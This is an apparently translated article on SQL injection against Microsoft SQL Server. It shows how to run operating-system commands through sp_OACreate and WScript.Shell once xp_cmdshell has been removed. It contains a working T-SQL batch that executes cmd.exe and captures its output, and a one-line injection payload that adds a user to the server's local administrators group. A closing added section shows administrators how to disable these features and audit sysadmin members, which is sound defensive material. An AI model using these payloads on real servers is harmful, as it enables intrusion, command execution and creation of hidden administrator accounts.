The most interesting one is probably running operating system console commands through the extended stored procedure xp_cmdshell. This method is also very simple; just use the following SQL statement:
EXEC master.dbo.xp_cmdshell 'DIR C:\'
But more and more database administrators have realised the potential danger of this extended stored procedure, and they may delete or rename the dynamic link library xplog70.dll that backs it, at which point many people give up. Without the ability to run any CMD command, it is hard to view the other side's files, directories and running services, and impossible to add NT users.
I have studied this, and later I found that even if xp_cmdshell is not available, it is still possible to run CMD on the server and get the result back. Here you need several SQL Server system stored procedures: sp_OACreate, sp_OAGetProperty and sp_OAMethod. The precondition is that WScript.Shell and Scripting.FileSystemObject are available on the server.
sp_OACreate creates an instance of an OLE object on an instance of Microsoft SQL Server.
Syntax: sp_OACreate { progid | clsid }, objecttoken OUTPUT [, context]
sp_OAGetProperty gets a property value of an OLE object.
Syntax: sp_OAGetProperty objecttoken, propertyname [, propertyvalue OUTPUT] [, index...]
sp_OAMethod calls a method of an OLE object.
Syntax: sp_OAMethod objecttoken, methodname [, returnvalue OUTPUT] [, [@parametername =] parameter [OUTPUT] [...n]]
The idea: first create a WScript.Shell object on the SQL Server and call its Run method so that the output of cmd.exe is redirected into a file; then create a Scripting.FileSystemObject, obtain a TextStream object from it, read the temporary file line by line and insert each line as a row into a temporary table.
The corresponding SQL statements are:
CREATE TABLE mytmp (info VARCHAR(400), id INT IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_OACreate 'wscript.shell', @shell OUTPUT
EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c dir C:\ > C:\TEMP.TXT', '0', 'TRUE'
-- Note: the TRUE argument of Run means "wait for the command to finish before returning".
-- It is required whenever the result is needed, and especially for long-running commands such as PING.
EXEC sp_OACreate 'scripting.filesystemobject', @fso OUTPUT
EXEC sp_OAMethod @fso, 'opentextfile', @file OUT, 'c:\temp.txt'
-- Because the FSO OpenTextFile method returns a TextStream object, @file here is an object token.
WHILE @shell > 0
BEGIN
    EXEC sp_OAMethod @file, 'Readline', @out OUT
    INSERT INTO mytmp (info) VALUES (@out)
    EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT
    IF @isEnd = 1 BREAK ELSE CONTINUE
END
DROP TABLE mytmp
Note: when this method is used during an injection test, the whole batch must be written on a single line, with the statements separated by spaces.
Let me give you an idea of what that looks like:
declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators sohu /add' --
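From the administrator's side, the whole technique rests on two server features: xp_cmdshell and the sp_OA* OLE automation procedures. The following script is an added example (not from the original article) that shows how a DBA checks and switches both off; it assumes SQL Server 2005 or later, where the 'Ole Automation Procedures' configuration option exists.

```sql
-- Added example, not part of the original article. Assumes SQL Server 2005 or later.

-- 1. Show the current state of the two server options this technique depends on
--    (value_in_use = 1 means the feature is enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 2. Both are advanced options: expose them, then switch them off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;

-- 3. sp_OACreate requires membership in sysadmin (or an explicit EXECUTE grant),
--    so review who holds sysadmin: every login listed here can reach the OS
--    if the option is ever re-enabled, which is why application logins should
--    never be members of this role.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';
```

Re-running the first query after RECONFIGURE should show value_in_use = 0 for both options.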